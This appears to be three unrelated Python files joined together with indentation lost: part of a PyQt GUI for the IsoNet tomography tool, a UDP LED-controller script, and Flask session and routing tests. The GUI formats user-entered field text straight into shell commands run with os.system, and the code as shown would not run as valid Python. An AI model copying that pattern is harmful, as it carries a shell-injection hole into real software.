#self.debugPrint( "Browse button pressed" )
def browseFolderSlot( self , btn):
''' Called when the user presses the Browse folder button
'''
lineEdit = self.switch_btn(btn)
try:
dir_path=QtWidgets.QFileDialog.getExistingDirectory(None,"Choose Directory",self.model.getPwd())
#self.model.setFolderName( dir_path )
#cmd = "echo choose folder: {} >> log.txt ".format(dir_path)
#os.system(cmd)
#self.logWindow.append("choose folder: {}".format(dir_path) )
lineEdit.setText( dir_path )
#self.logWindow.moveCursor(QtGui.QTextCursor.End)
#self.refreshAll()
except:
##TODO: record to log.
pass
def advancedMenu( self , btn ):
''' Called when the user presses the Browse button
'''
widget = self.switch_btn(btn)
if widget.isVisible():
widget.setVisible(False)
else:
widget.setVisible(True)
def switch_btn(self, btn):
switcher = {
"mask_dir": self.lineEdit_mask_dir,
"tomo_dir": self.lineEdit_tomo_dir,
"pretrain_model":self.lineEdit_pretrain_model,
"output": self.lineEdit_output,
"refined_model":self.lineEdit_refined_model,
"advance_mask":self.widget_mask,
"advance_refine":self.widget_refine,
"advance_predict":self.widget_predict
}
return switcher.get(btn, "Invaid btn name")
def printCmds( self ):
pwd = os.getcwd().replace("\\","/")
cmd2run = []
if self.checkBox_mask.isChecked():
tomo_dir = self.lineEdit_tomo_dir.text()
mask_dir = self.lineEdit_mask_dir.text()
percentile = self.lineEdit_percentile.text() if self.lineEdit_percentile.text() else 100
threshold = self.lineEdit_threshold.text() if self.lineEdit_threshold.text() else 0.5
error_msg = self.model.paraChecksMask(tomo_dir, mask_dir, percentile, threshold)
if error_msg != "":
error_msg = "########## Error! ##########\n" + error_msg
#cmd = "echo \"{}\" >> log.txt".format(error_msg)
#print(cmd)
#os.system(cmd)
self.logWindow.append(error_msg)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
return None
else:
tomo_dir = self.model.sim_path(pwd, tomo_dir)
mask_dir = self.model.sim_path(pwd, mask_dir)
description = "run following command(s) to make mask:"
#cmd = "echo {} >> log.txt".format( description )
#os.system(cmd)
self.logWindow.append(description)
line = "isonet.py make_mask {} {} --percentile {} --threshold {} ".format( tomo_dir,mask_dir,percentile,threshold )
#cmd = "echo {} >> log.txt".format( line )
#os.system(cmd)
line += "\n"
self.logWindow.append(line)
cmd2run.append(line)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
if self.checkBox_deconvolve.isChecked():
tomo_dir = self.lineEdit_tomo_dir.text()
angpix = self.lineEdit_angpix.text()
defocus = self.lineEdit_defocus.text()
error_msg,fileList = self.model.paraChecksDeconvolve(tomo_dir, angpix, defocus)
if error_msg != "":
error_msg = "########## Error! ##########\n" + error_msg
#cmd = "echo \"{}\" >> log.txt".format(error_msg)
#print(cmd)
#os.system(cmd)
self.logWindow.append(error_msg)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
return None
elif len(fileList) > 0:
tomo_dir = self.model.sim_path(pwd, tomo_dir)
tomo_dir_deconv = tomo_dir + "_deconv"
description = "run following command(s) to deconvolve:"
#cmd = "echo {} >> log.txt".format( description )
#os.system(cmd)
self.logWindow.append(description)
if not self.model.isValidPath(tomo_dir_deconv):
os.mkdir(tomo_dir_deconv)
for file in fileList:
basename = os.path.basename(file)
line = "python deconvolve.py {} {} {} {} ".format( tomo_dir+"/"+file, tomo_dir_deconv+"/"+basename, angpix, defocus)
#cmd = "echo {} >> log.txt".format( line )
#os.system(cmd)
#line += "\n"
self.logWindow.append(line)
cmd2run.append(line)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
line = "\n"
self.logWindow.append(line)
if self.checkBox_train.isChecked():
tomo_dir = self.lineEdit_tomo_dir.text()
mask_dir = self.lineEdit_mask_dir.text()
iteration = self.lineEdit_iteration.text() if self.lineEdit_iteration.text() else '30'
epochs = self.lineEdit_epochs.text() if self.lineEdit_epochs.text() else '8'
steps_per_epoch = self.lineEdit_steps_per_epoch.text() if self.lineEdit_steps_per_epoch.text() else '200'
ncube = self.lineEdit_ncube.text() if self.lineEdit_ncube.text() else '300'
noise_level = self.lineEdit_noise_level.text() if self.lineEdit_noise_level.text() else '0.1'
noise_start_iter = self.lineEdit_noise_start_iteration.text() if self.lineEdit_noise_start_iteration.text() else '15'
noise_pause = self.lineEdit_noise_pause.text() if self.lineEdit_noise_pause.text() else '3'
batch_size = self.lineEdit_batch_size.text() if self.lineEdit_batch_size.text() else '8'
gpuID = self.lineEdit_gpu.text() if self.lineEdit_gpu.text() else '0,1,2,3'
pretrain_model = self.lineEdit_pretrain_model.text()
error_msg = self.model.paraChecksRefine( tomo_dir, mask_dir, pretrain_model,
iteration, epochs, steps_per_epoch, ncube,
noise_level,noise_start_iter, noise_pause, batch_size, gpuID)
if error_msg != "":
error_msg = "########## Error! ##########\n" + error_msg
#cmd = "echo \"{}\" >> log.txt".format(error_msg)
#print(cmd)
#os.system(cmd)
self.logWindow.append(error_msg)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
return None
#with pretrain model
else :
tomo_dir = self.model.sim_path(pwd, tomo_dir)
mask_dir = self.model.sim_path(pwd, mask_dir)
if pretrain_model:
pretrain_model = self.model.sim_path(pwd, pretrain_model)
line = "isonet.py refine --input_dir {} --mask_dir {} --pretrain_model {} --iterations {} --steps_per_epoch {} --ncube {} --noise_level {} --noise_start_iter {} --noise_pause {} --epochs {} --batch_size {} --gpuID {}".format(
tomo_dir, mask_dir, pretrain_model, iteration,steps_per_epoch,ncube,noise_level,noise_start_iter,noise_pause,epochs,batch_size,gpuID)
else:
line = "isonet.py refine --input_dir {} --mask_dir {} --iterations {} --steps_per_epoch {} --ncube {} --noise_level {} --noise_start_iter {} --noise_pause {} --epochs {} --batch_size {} --gpuID {}".format(
tomo_dir, mask_dir, iteration,steps_per_epoch,ncube,noise_level,noise_start_iter,noise_pause,epochs,batch_size,gpuID)
description = "run following command(s) to refine:"
#cmd = "echo {} >> log.txt".format( description )
#os.system(cmd)
self.logWindow.append(description)
#cmd = "echo {} >> log.txt".format( line )
#os.system(cmd)
#line += "\n"
self.logWindow.append(line)
cmd2run.append(line)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
if self.checkBox_predict.isChecked():
tomo_dir = self.lineEdit_tomo_dir.text()
output_dir = self.lineEdit_output.text()
refined_model = self.lineEdit_refined_model.text()
gpuID = self.lineEdit_gpu.text() if self.lineEdit_gpu.text() else '0,1,2,3'
error_msg,fileList = self.model.paraChecksPredict(tomo_dir, output_dir, refined_model, gpuID)
if error_msg != "":
error_msg = "########## Error! ##########\n" + error_msg
#cmd = "echo \"{}\" >> log.txt".format(error_msg)
#print(cmd)
#os.system(cmd)
self.logWindow.append(error_msg)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
return None
elif len(fileList) > 0:
tomo_dir = self.model.sim_path(pwd, tomo_dir)
output_dir = self.model.sim_path(pwd, output_dir)
refined_model = self.model.sim_path(pwd, refined_model)
description = "run following command(s) to predict:"
#cmd = "echo {} >> log.txt".format( description )
#os.system(cmd)
self.logWindow.append(description)
for file in fileList:
basename = file[:-4]
output_file = basename + "_pred.mrc"
line = "isonet.py predict {} {} {} --gpuID {} ".format( tomo_dir+"/"+file, output_dir+"/"+output_file, refined_model, gpuID)
#cmd = "echo {} >> log.txt".format( line )
#os.system(cmd)
line += "\n"
self.logWindow.append(line)
cmd2run.append(line)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
return cmd2run
#TODO: add a function to update the log window
def runProgram(self):
cmd2run = self.printCmds()
#print(cmd2run)
#self.model.processing = True
#t = Thread(target=self.update_log)
#t.start()
#self.update_log()
#self.model.processing = False
#t.terminate()
#import subprocess
#text = os.popen("ls -l").read()
#command = ['ls', '-l']
#p = subprocess.Popen(command, stdout=subprocess.PIPE)
#text = p.stdout.read()
#retcode = p.wait()
#print(str(text))
#file_log = open('log.txt', 'a')
#file_log.write(str(text))
#file_log.close()
#self.update_log()
for line in cmd2run:
cmd = "{} ".format( line)
print(cmd)
os.system(cmd)
def showResults( self ):
output_dir = self.lineEdit_output.text()
error_message = ""
if output_dir:
if not self.model.isValidPath(output_dir):
error_message += "output directory does not exist! \n"
else:
fileList = self.model.is_file_exist(output_dir, '.mrc')
if len(fileList) == 0:
error_message += "no mrc file exists in output directory \n"
else:
error_message += "output directory is not provided! \n"
if error_message == "":
cmd = "3dmod {}/*mrc".format(output_dir)
os.system(cmd)
else:
self.logWindow.append(error_message)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
'''
def update_log(self):
f = open("log.txt", 'r')
where = f.tell()
line = f.readline()
while line:
self.logWindow.append(line)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
where+=1
while self.model.processing:
where = f.tell()
line = f.readline()
if not line:
time.sleep(1)
f.seek(where)
else:
self.logWindow.append(line)
self.logWindow.moveCursor(QtGui.QTextCursor.End)
'''
def main():
"""
This is the MAIN ENTRY POINT of our application. The code at the end
of the mainwindow.py script will not be executed, since this script is now
our main program. We have simply copied the code from mainwindow.py here
since it was automatically generated by '''pyuic5'''.
"""
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = MainWindowUIClass()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
main()
|
Virtual_controller_to_wifi.py
|
import socket
import struct
import sys
import time
from time import time as tt
import numpy as np
import os.path
from openframeworks import *
from protopixel import Content
import socket
UDP_IP = "192.168.1.100"
UDP_PORT = 2390
content = Content('Virtual controller')
content.add_parameter("FPS_LIMIT", min=0, max=60, value=30)
content.add_parameter("Controller1", value=False)
content.add_parameter("audio_react1", value=False)
content.add_parameter("IP_1", value="192.168.133.20")
content.add_parameter("Controller2", value=False)
content.add_parameter("audio_react2", value=False)
content.add_parameter("IP_2", value="192.168.133.21")
content.add_parameter("Controller3", value=False)
content.add_parameter("audio_react3", value=False)
content.add_parameter("IP_3", value="192.168.133.22")
content.add_parameter("Controller4", value=False)
content.add_parameter("audio_react4", value=False)
content.add_parameter("IP_4", value="192.168.133.23")
@content.parameter_changed('Output_name')
def output_name_changed(newval):
#global FILEPATH
#FILEPATH = "../../../"+newval+".txt"
#print "New path:", newval
pass
def setup():
global controller, update_time, timmer, qframe, qtimmer, is_started,FPS
print "SETUP------------------------"
FPS = 30
controller = None
update_time = 1.0/FPS
timmer = tt()
qframe = 0
qtimmer = tt()
is_started = True
#pt = ofToDataPath(".")
#print pt,"-----------------ooooooooooo"
def update():
global update_time, timmer, qframe, qtimmer, controller,FPS
if controller != None and controller.outlets[0] != None:
i = 0
for q in range(4):
msg = ""
numlights = len(controller.outlets[i]) / 3
if numlights < 200:
msg = ''.join( chr(v) for v in controller.outlets[i])
msg = msg + ''.join( [chr(0)] * ((200-numlights)*3))
else:
msg = ''.join( chr(v) for v in controller.outlets[i][0:600])
i = i+1
numlights = len(controller.outlets[i]) / 3
if numlights < 200:
msg = msg + ''.join( chr(v) for v in controller.outlets[i])
msg = msg + ''.join( [chr(0)] * ((200-numlights)*3))
else:
msg = msg + ''.join( chr(v) for v in controller.outlets[i][0:600])
i = i+1
#print content['IP_'+str(i+1)]
#print content['Controller'+str(i+1)]
#msg = ''.join( [chr(255)] * ((400)*3))
if content['Controller'+str(q+1)]:
try:
print len(msg), content['IP_'+str(q+1)]
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
sock.sendto(msg, (content['IP_'+str(q+1)], UDP_PORT))
except:
print "socket error unknown at device: "+str(q+1)
#----------
#FPS check
#if qframe >= FPS-1:
# qframe = 0
# print tt() - qtimmer
# qtimmer = tt()
# print "------------------"
#else:
# qframe = qframe + 1;
#--------
#--------
#FPS limiter:
actual = tt()
elapsed = actual-timmer
#30 fps --> 1/30
diff = update_time- elapsed
if diff > 0:
time.sleep(diff)
timmer = tt()
FPS = content['FPS_LIMIT']
update_time = 1.0/FPS
#--------
def draw():
pass
def exit():
global controller
print "EXIT------------------------"
controller.running = False
controller = None
def on_enable():
global controller, is_started
if not is_started:
return
print "ENABLE------------------------"
controller = FakeTCPController()
controller.listen() # obre el port
#controller.announce() # fa un anounce
def on_disable():
global controller
print "DISABLE------------------------"
controller.running = False
controller = None
class FakeTCPController(object):
def __init__(self):
self.name = "Wifi"
self.mac = "00:00:00:00:00:01"
self.t = content.Thread(target=self._process)
self.t.daemon = True
self.running = False
self.outlets = [np.zeros(0)]*8
def announce(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
message_version = 2
firmware_version = 1
hardware_version = 2
mac_addr_1, mac_addr_2, mac_addr_3, mac_addr_4, mac_addr_5, mac_addr_6 = (0, 0, 0, 0, 0, 0)
actual_ip_1, actual_ip_2, actual_ip_3, actual_ip_4 = (127, 0, 0, 1)
properties = 0
actual_gateway_1, actual_gateway_2, actual_gateway_3, actual_gateway_4 = (192, 168, 133, 1)
actual_mask_1, actual_mask_2, actual_mask_3, actual_mask_4 = (255, 255, 255, 0)
device_name = "WIFI"
static_ip_1, static_ip_2, static_ip_3, static_ip_4 = (192, 168, 133, 222)
static_gateway_1, static_gateway_2, static_gateway_3, static_gateway_4 = (192, 168, 133, 1)
static_mask_1, static_mask_2, static_mask_3, static_mask_4 = (255, 255, 255, 0)
message = struct.pack('<HHB6B4BB4B4B16s4B4B4B',
message_version,
firmware_version,
hardware_version,
mac_addr_1, mac_addr_2, mac_addr_3, mac_addr_4, mac_addr_5, mac_addr_6,
actual_ip_1, actual_ip_2, actual_ip_3, actual_ip_4,
properties,
actual_gateway_1, actual_gateway_2, actual_gateway_3, actual_gateway_4,
actual_mask_1, actual_mask_2, actual_mask_3, actual_mask_4,
device_name,
static_ip_1, static_ip_2, static_ip_3, static_ip_4,
static_gateway_1, static_gateway_2, static_gateway_3, static_gateway_4,
static_mask_1, static_mask_2, static_mask_3, static_mask_4,
)
s.sendto(message, ('localhost', 5006))
def listen(self):
self.running = True
self.t.start()
def stop(self):
self.running = False
def _process(self):
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('localhost',5015))
s.listen(1)
s.settimeout(0.3)
#self.timmer = tt()
i = 0
while self.running:
try:
i = (1 + i) % 10
if i == 0:
self.announce()
(ss, _) = s.accept()
ss.settimeout(1)
print "New Connection"
while self.running:
header = ss.recv(23)
if not header:
break
assert header[:5] == "PROTO"
ss.send('ok')
LED_count = struct.unpack('>8H',header[7:7+8*2])
for i in range(8):
lcount = LED_count[i]
if lcount == 0:
continue
outletdata = ss.recv(lcount*3)
self.outlets[i] = np.fromstring(outletdata,dtype=np.uint8)
except socket.timeout:
pass
except socket.error:
pass
s.close()
def __del__(self):
self.running = False
|
test_basic.py
|
import gc
import re
import sys
import time
import uuid
import weakref
from datetime import datetime
from platform import python_implementation
from threading import Thread
import pytest
import werkzeug.serving
from werkzeug.exceptions import BadRequest
from werkzeug.exceptions import Forbidden
from werkzeug.exceptions import NotFound
from werkzeug.http import parse_date
from werkzeug.routing import BuildError
import flask
require_cpython_gc = pytest.mark.skipif(
python_implementation() != "CPython", reason="Requires CPython GC behavior",
)
def test_options_work(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
assert rv.data == b""
def test_options_on_multiple_rules(app, client):
@app.route("/", methods=["GET", "POST"])
def index():
return "Hello World"
@app.route("/", methods=["PUT"])
def index_put():
return "Aha!"
rv = client.open("/", method="OPTIONS")
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST", "PUT"]
def test_provide_automatic_options_attr():
app = flask.Flask(__name__)
def index():
return "Hello World!"
index.provide_automatic_options = False
app.route("/")(index)
rv = app.test_client().open("/", method="OPTIONS")
assert rv.status_code == 405
app = flask.Flask(__name__)
def index2():
return "Hello World!"
index2.provide_automatic_options = True
app.route("/", methods=["OPTIONS"])(index2)
rv = app.test_client().open("/", method="OPTIONS")
assert sorted(rv.allow) == ["OPTIONS"]
def test_provide_automatic_options_kwarg(app, client):
def index():
return flask.request.method
def more():
return flask.request.method
app.add_url_rule("/", view_func=index, provide_automatic_options=False)
app.add_url_rule(
"/more",
view_func=more,
methods=["GET", "POST"],
provide_automatic_options=False,
)
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD"]
rv = client.open("/", method="OPTIONS")
assert rv.status_code == 405
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "POST"]
rv = client.open("/more", method="OPTIONS")
assert rv.status_code == 405
def test_request_dispatching(app, client):
@app.route("/")
def index():
return flask.request.method
@app.route("/more", methods=["GET", "POST"])
def more():
return flask.request.method
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
def test_disallow_string_for_allowed_methods(app):
with pytest.raises(TypeError):
@app.route("/", methods="GET POST")
def index():
return "Hey"
def test_url_mapping(app, client):
random_uuid4 = "7eb41166-9ebf-4d26-b771-ea3f54f8b383"
def index():
return flask.request.method
def more():
return flask.request.method
def options():
return random_uuid4
app.add_url_rule("/", "index", index)
app.add_url_rule("/more", "more", more, methods=["GET", "POST"])
# Issue 1288: Test that automatic options are not added
# when non-uppercase 'options' in methods
app.add_url_rule("/options", "options", options, methods=["options"])
assert client.get("/").data == b"GET"
rv = client.post("/")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS"]
rv = client.head("/")
assert rv.status_code == 200
assert not rv.data # head truncates
assert client.post("/more").data == b"POST"
assert client.get("/more").data == b"GET"
rv = client.delete("/more")
assert rv.status_code == 405
assert sorted(rv.allow) == ["GET", "HEAD", "OPTIONS", "POST"]
rv = client.open("/options", method="OPTIONS")
assert rv.status_code == 200
assert random_uuid4 in rv.data.decode("utf-8")
def test_werkzeug_routing(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
def bar():
return "bar"
def index():
return "index"
app.view_functions["bar"] = bar
app.view_functions["index"] = index
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_endpoint_decorator(app, client):
from werkzeug.routing import Submount, Rule
app.url_map.add(
Submount("/foo", [Rule("/bar", endpoint="bar"), Rule("/", endpoint="index")])
)
@app.endpoint("bar")
def bar():
return "bar"
@app.endpoint("index")
def index():
return "index"
assert client.get("/foo/").data == b"index"
assert client.get("/foo/bar").data == b"bar"
def test_session(app, client):
@app.route("/set", methods=["POST"])
def set():
assert not flask.session.accessed
assert not flask.session.modified
flask.session["value"] = flask.request.form["value"]
assert flask.session.accessed
assert flask.session.modified
return "value set"
@app.route("/get")
def get():
assert not flask.session.accessed
assert not flask.session.modified
v = flask.session.get("value", "None")
assert flask.session.accessed
assert not flask.session.modified
return v
assert client.post("/set", data={"value": "42"}).data == b"value set"
assert client.get("/get").data == b"42"
def test_session_using_server_name(app, client):
app.config.update(SERVER_NAME="example.com")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_and_port(app, client):
app.config.update(SERVER_NAME="example.com:8080")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "domain=.example.com" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_server_name_port_and_path(app, client):
app.config.update(SERVER_NAME="example.com:8080", APPLICATION_ROOT="/foo")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/foo")
assert "domain=example.com" in rv.headers["set-cookie"].lower()
assert "path=/foo" in rv.headers["set-cookie"].lower()
assert "httponly" in rv.headers["set-cookie"].lower()
def test_session_using_application_root(app, client):
class PrefixPathMiddleware:
def __init__(self, app, prefix):
self.app = app
self.prefix = prefix
def __call__(self, environ, start_response):
environ["SCRIPT_NAME"] = self.prefix
return self.app(environ, start_response)
app.wsgi_app = PrefixPathMiddleware(app.wsgi_app, "/bar")
app.config.update(APPLICATION_ROOT="/bar")
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://example.com:8080/")
assert "path=/bar" in rv.headers["set-cookie"].lower()
def test_session_using_session_settings(app, client):
app.config.update(
SERVER_NAME="www.example.com:8080",
APPLICATION_ROOT="/test",
SESSION_COOKIE_DOMAIN=".example.com",
SESSION_COOKIE_HTTPONLY=False,
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_SAMESITE="Lax",
SESSION_COOKIE_PATH="/",
)
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
rv = client.get("/", "http://www.example.com:8080/test/")
cookie = rv.headers["set-cookie"].lower()
assert "domain=.example.com" in cookie
assert "path=/" in cookie
assert "secure" in cookie
assert "httponly" not in cookie
assert "samesite" in cookie
def test_session_using_samesite_attribute(app, client):
@app.route("/")
def index():
flask.session["testing"] = 42
return "Hello World"
app.config.update(SESSION_COOKIE_SAMESITE="invalid")
with pytest.raises(ValueError):
client.get("/")
app.config.update(SESSION_COOKIE_SAMESITE=None)
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite" not in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Strict")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=strict" in cookie
app.config.update(SESSION_COOKIE_SAMESITE="Lax")
rv = client.get("/")
cookie = rv.headers["set-cookie"].lower()
assert "samesite=lax" in cookie
def test_session_localhost_warning(recwarn, app, client):
app.config.update(SERVER_NAME="localhost:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://localhost:5000/")
assert "domain" not in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert "'localhost' is not a valid cookie domain" in str(w.message)
def test_session_ip_warning(recwarn, app, client):
app.config.update(SERVER_NAME="127.0.0.1:5000")
@app.route("/")
def index():
flask.session["testing"] = 42
return "testing"
rv = client.get("/", "http://127.0.0.1:5000/")
assert "domain=127.0.0.1" in rv.headers["set-cookie"].lower()
w = recwarn.pop(UserWarning)
assert "cookie domain is an IP" in str(w.message)
def test_missing_session(app):
app.secret_key = None
def expect_exception(f, *args, **kwargs):
e = pytest.raises(RuntimeError, f, *args, **kwargs)
assert e.value.args and "session is unavailable" in e.value.args[0]
with app.test_request_context():
assert flask.session.get("missing_key") is None
expect_exception(flask.session.__setitem__, "foo", 42)
expect_exception(flask.session.pop, "foo")
def test_session_expiration(app, client):
permanent = True
@app.route("/")
def index():
flask.session["test"] = 42
flask.session.permanent = permanent
return ""
@app.route("/test")
def test():
return str(flask.session.permanent)
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"(?i)\bexpires=([^;]+)", rv.headers["set-cookie"])
expires = parse_date(match.group())
expected = datetime.utcnow() + app.permanent_session_lifetime
assert expires.year == expected.year
assert expires.month == expected.month
assert expires.day == expected.day
rv = client.get("/test")
assert rv.data == b"True"
permanent = False
rv = client.get("/")
assert "set-cookie" in rv.headers
match = re.search(r"\bexpires=([^;]+)", rv.headers["set-cookie"])
assert match is None
def test_session_stored_last(app, client):
@app.after_request
def modify_session(response):
flask.session["foo"] = 42
return response
@app.route("/")
def dump_session_contents():
return repr(flask.session.get("foo"))
assert client.get("/").data == b"None"
assert client.get("/").data == b"42"
def test_session_special_types(app, client):
now = datetime.utcnow().replace(microsecond=0)
the_uuid = uuid.uuid4()
@app.route("/")
def dump_session_contents():
flask.session["t"] = (1, 2, 3)
flask.session["b"] = b"\xff"
flask.session["m"] = flask.Markup("<html>")
flask.session["u"] = the_uuid
flask.session["d"] = now
flask.session["t_tag"] = {" t": "not-a-tuple"}
flask.session["di_t_tag"] = {" t__": "not-a-tuple"}
flask.session["di_tag"] = {" di": "not-a-dict"}
return "", 204
with client:
client.get("/")
s = flask.session
assert s["t"] == (1, 2, 3)
assert type(s["b"]) == bytes
assert s["b"] == b"\xff"
assert type(s["m"]) == flask.Markup
assert s["m"] == flask.Markup("<html>")
assert s["u"] == the_uuid
assert s["d"] == now
assert s["t_tag"] == {" t": "not-a-tuple"}
assert s["di_t_tag"] == {" t__": "not-a-tuple"}
assert s["di_tag"] == {" di": "not-a-dict"}
def test_session_cookie_setting(app):
is_permanent = True
@app.route("/bump")
def bump():
rv = flask.session["foo"] = flask.session.get("foo", 0) + 1
flask.session.permanent = is_permanent
return str(rv)
@app.route("/read")
def read():
return str(flask.session.get("foo", 0))
def run_test(expect_header):
with app.test_client() as c:
assert c.get("/bump").data == b"1"
assert c.get("/bump").data == b"2"
assert c.get("/bump").data == b"3"
rv = c.get("/read")
set_cookie = rv.headers.get("set-cookie")
assert (set_cookie is not None) == expect_header
assert rv.data == b"3"
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=True)
is_permanent = True
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = True
run_test(expect_header=False)
is_permanent = False
app.config["SESSION_REFRESH_EACH_REQUEST"] = False
run_test(expect_header=False)
def test_session_vary_cookie(app, client):
@app.route("/set")
def set_session():
flask.session["test"] = "test"
return ""
@app.route("/get")
def get():
return flask.session.get("test")
@app.route("/getitem")
def getitem():
return flask.session["test"]
@app.route("/setdefault")
def setdefault():
return flask.session.setdefault("test", "default")
@app.route("/vary-cookie-header-set")
def vary_cookie_header_set():
response = flask.Response()
response.vary.add("Cookie")
flask.session["test"] = "test"
return response
@app.route("/vary-header-set")
def vary_header_set():
response = flask.Response()
response.vary.update(("Accept-Encoding", "Accept-Language"))
flask.session["test"] = "test"
return response
@app.route("/no-vary-header")
def no_vary_header():
return ""
def expect(path, header_value="Cookie"):
rv = client.get(path)
if header_value:
# The 'Vary' key should exist in the headers only once.
assert len(rv.headers.get_all("Vary")) == 1
assert rv.headers["Vary"] == header_value
else:
assert "Vary" not in rv.headers
expect("/set")
expect("/get")
expect("/getitem")
expect("/setdefault")
expect("/vary-cookie-header-set")
expect("/vary-header-set", "Accept-Encoding, Accept-Language, Cookie")
expect("/no-vary-header", None)
def test_flashes(app, req_ctx):
assert not flask.session.modified
flask.flash("Zap")
flask.session.modified = False
flask.flash("Zip")
assert flask.session.modified
assert list(flask.get_flashed_messages()) == ["Zap", "Zip"]
def test_extended_flashing(app):
# Be sure app.testing=True below, else tests can fail silently.
#
# Specifically, if app.testing is not set to True, the AssertionErrors
# in the view functions will cause a 500 response to the test client
# instead of propagating exceptions.
@app.route("/")
def index():
flask.flash("Hello World")
flask.flash("Hello World", "error")
flask.flash(flask.Markup("<em>Testing</em>"), "warning")
return ""
@app.route("/test/")
def test():
messages = flask.get_flashed_messages()
assert list(messages) == [
"Hello World",
"Hello World",
flask.Markup("<em>Testing</em>"),
]
return ""
@app.route("/test_with_categories/")
def test_with_categories():
messages = flask.get_flashed_messages(with_categories=True)
assert len(messages) == 3
assert list(messages) == [
("message", "Hello World"),
("error", "Hello World"),
("warning", flask.Markup("<em>Testing</em>")),
]
return ""
@app.route("/test_filter/")
def test_filter():
messages = flask.get_flashed_messages(
category_filter=["message"], with_categories=True
)
assert list(messages) == [("message", "Hello World")]
return ""
@app.route("/test_filters/")
def test_filters():
messages = flask.get_flashed_messages(
category_filter=["message", "warning"], with_categories=True
)
assert list(messages) == [
("message", "Hello World"),
("warning", flask.Markup("<em>Testing</em>")),
]
return ""
@app.route("/test_filters_without_returning_categories/")
def test_filters2():
messages = flask.get_flashed_messages(category_filter=["message", "warning"])
assert len(messages) == 2
assert messages[0] == "Hello World"
assert messages[1] == flask.Markup("<em>Testing</em>")
return ""
# Create new test client on each test to clean flashed messages.
client = app.test_client()
client.get("/")
client.get("/test_with_categories/")
client = app.test_client()
client.get("/")
client.get("/test_filter/")
client = app.test_client()
client.get("/")
client.get("/test_filters/")
client = app.test_client()
client.get("/")
client.get("/test_filters_without_returning_categories/")
def test_request_processing(app, client):
evts = []
@app.before_request
def before_request():
evts.append("before")
@app.after_request
def after_request(response):
response.data += b"|after"
evts.append("after")
return response
@app.route("/")
def index():
assert "before" in evts
assert "after" not in evts
return "request"
assert "after" not in evts
rv = client.get("/").data
assert "after" in evts
assert rv == b"request|after"
def test_request_preprocessing_early_return(app, client):
evts = []
@app.before_request
def before_request1():
evts.append(1)
@app.before_request
def before_request2():
evts.append(2)
return "hello"
@app.before_request
def before_request3():
evts.append(3)
return "bye"
@app.route("/")
def index():
evts.append("index")
return "damnit"
rv = client.get("/").data.strip()
assert rv == b"hello"
assert evts == [1, 2]
def test_after_request_processing(app, client):
@app.route("/")
def index():
@flask.after_this_request
def foo(response):
response.headers["X-Foo"] = "a header"
return response
return "Test"
resp = client.get("/")
assert resp.status_code == 200
assert resp.headers["X-Foo"] == "a header"
def test_teardown_request_handler(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
